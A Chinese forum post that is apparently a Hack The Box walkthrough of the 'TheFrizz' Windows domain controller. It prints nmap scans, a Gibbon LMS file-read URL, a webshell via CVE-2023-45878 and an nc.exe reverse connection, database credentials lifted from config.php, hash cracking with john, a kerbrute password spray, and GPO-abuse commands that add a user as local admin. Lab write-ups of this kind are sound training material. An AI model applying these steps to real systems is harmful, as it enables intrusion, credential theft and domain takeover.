民工心事 发表于 2025-4-7 17:59:10

HTB打靶记录-TheFrizz

信息收集

nmap -sV -sC -O 10.10.11.60
Nmap scan report for 10.10.11.60
Host is up (0.63s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT   STATE SERVICE       VERSION
22/tcp   openssh         OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp   opendomain      Simple DNS Plus
80/tcp   openhttp          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
88/tcp   openkerberos-secMicrosoft Windows Kerberos (server time: 2025-04-06 16:58:47Z)
135/tcpopenmsrpc         Microsoft Windows RPC
139/tcpopennetbios-ssn   Microsoft Windows netbios-ssn
389/tcpopenldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcpopenmicrosoft-ds?
464/tcpopenkpasswd5?
593/tcpopenncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcpopentcpwrapped
3268/tcp openldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp opentcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 6h40m55s
| smb2-time:
|   date: 2025-04-06T16:59:55
|_start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.30 secondsCVE-2023-45878

有个web服务,搜一下有cve,可以读sql文件
http://frizzdc.frizz.htb/Gibbon-LMS//?q=./gibbon.sql
没用,继续搜,CVE-2023-45878,写webshell
https://raw.githubusercontent.com/F12-F12/markdown/main/20250407135212.png
蚁剑毗连,传个nc.exe上去反连
net user /domain
a.perlstein
Administrator
c.ramon
c.sandiego
d.hudson
f.frizzle
g.frizzle
Guest
h.arm
J.perlstein
k.franklin
krbtgt
l.awesome
m.ramon
M.SchoolBus
p.terese
r.tennelli
t.wright
v.frizzle
w.li
w.Webservicemysql

检察config.php内容,拿到mysql账号密码
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';使用frp把3306端口代理出来,用navicat毗连,检察gibbonperson表,拿到密码和盐值
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03$/aACFhikmNopqrRTVz2489
john爆破
john --format=dynamic='sha256($s.$p)' --wordlist=/usr/share/wordlists/rockyou.txt 1.hash
拿到密码:***********
因为没开5985端口,所以不能通过winrm登录,这里通过获取f.frizzle票据通过ssh去登录
Kerberos认证

修改/etc/krb5.conf

        default_realm = FRIZZ.HTB

# The following krb5.conf variables are only for MIT Kerberos.
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
      rdns = false


# The following libdefaults parameters are only for Heimdal Kerberos.
        fcc-mit-ticketflags = true


    FRIZZ.HTB = {
      kdc = frizzdc.frizz.htb
      admin_server = frizzdc.firzz.htb
      default_domain = frizz.htb
    }


    .frizz.htb = FRIZZ.HTB
    frizz.htb = FRIZZ.HTBkinit f.frizzle@FRIZZ.HTB 去请求票据
klist 检察票据
https://raw.githubusercontent.com/F12-F12/markdown/main/20250407151755.png
ssh f.frizzle@frizz.htb -K 通过票据去登录,读取desktop/user.txt
bloodhound

一直超时,我cnm,只好传个SharpHound.exe上去收集,卡到怀疑人生,最后通过nc将压缩包传回kali
分析f.frizzle的域关系网,什么都没有。废物用户,采取站翻到一个压缩包
https://raw.githubusercontent.com/F12-F12/markdown/main/20250407160306.png
通过nc传输,等了半天,解压缩找密码
grep -IR "wapt_password",为什么这么找?因为文件名是这个,直接搜password太多了
拿到密码:!suBcig@MehTed!R
密码喷洒一下,kerbrute passwordspray -d frizz.htb --dc 10.10.11.60 user.txt '!suBcig@MehTed!R'
https://raw.githubusercontent.com/F12-F12/markdown/main/20250407163414.png
是M.SchoolBus的,ssh连上去
https://raw.githubusercontent.com/F12-F12/markdown/main/20250407163653.png
这环境shi一样,接下来说思路,bloodhound检察M.SchoolBus的关系网
https://raw.githubusercontent.com/F12-F12/markdown/main/20250407164603.png
M.SchoolBus属于GPCO组,说明M.SchoolBus可以打GPO Abuse,写一个恶意GPO进去来进行提权
// 创建恶意GOP
New-GPO -Name "hacker"
// 链接GPO到域控制器
New-GPLink -Name "hacker" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
// 将M.SchoolBus加入域管理员组
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName hacker
// 刷新GPO
gpupdate /force结束

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: HTB打靶记录-TheFrizz